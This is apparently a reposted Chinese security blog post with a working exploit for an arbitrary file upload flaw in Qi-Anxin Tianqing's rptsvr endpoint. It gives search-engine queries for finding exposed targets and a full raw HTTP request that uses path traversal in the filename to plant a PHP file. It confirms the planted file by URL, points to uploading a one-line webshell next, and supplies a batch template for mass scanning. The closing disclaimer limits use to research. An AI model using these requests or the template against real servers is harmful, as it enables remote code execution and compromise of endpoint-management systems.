漏洞简介
COLD WINTER
奇安信 天擎管理中心 rptsvr接口存在任意文件上传漏洞,可上传恶意文件至服务器,执行脚本文件可远程命令执行,造成服务器失陷。
漏洞复现
COLD WINTER
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
icon_hash="-829652342"
banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
步骤二:抓取首页数据包并修改数据包如下后进行文件上传测试...根据返回的正文可得之已成功上传!!!
POST /rptsvr/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (MacintoshT2lkQm95Rw==; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460
Upgrade-Insecure-Requests: 1
-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/a.php"
Content-Type: text/x-python
<?php phpinfo();?>
-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="token"
skylar_report
-----------------------------55433477442814818502792421460
步骤三:访问上传文件地址..可查看到指定的phpinfo()函数内容
http://127.0.0.1/application/api/controllers/a.php
步骤四:尝试上传一句话木马并测试...
批量脚本
COLD WINTER
id: qax-tq-rptsvr-fileupload
info:
name: qax-tq-rptsvr-fileupload
kali :
severity: critical
description: 奇安信天擎终端安全管理系统V6.7.0.4130前台文件上传漏洞(XVE-2023-24876)
requests:
raw:
|
POST /rptsvr/upload HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
en-US,en;q=0.5 :
gzip, deflate :
multipart/form-data;boundary=---------------------------55433477442814818502792421460 :
1 :
-----------------------------55433477442814818502792421460
form-data; name="uploadfile"; filename="../../../application/api/controllers/TController.php" :
text/x-python :
{{randstr}}
-----------------------------55433477442814818502792421460
form-data; name="token" :
skylar_report
-----------------------------55433477442814818502792421460
|
GET /application/api/controllers/TController.php HTTP/1.1
Host: {{Hostname}}
matchers:
type: dsl
dsl:
"contains_all(body_2, '{{randstr}}') && status_code_2==200"
原文始发于微信公众号(揽月安全团队):奇安信天擎 rptsvr 任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论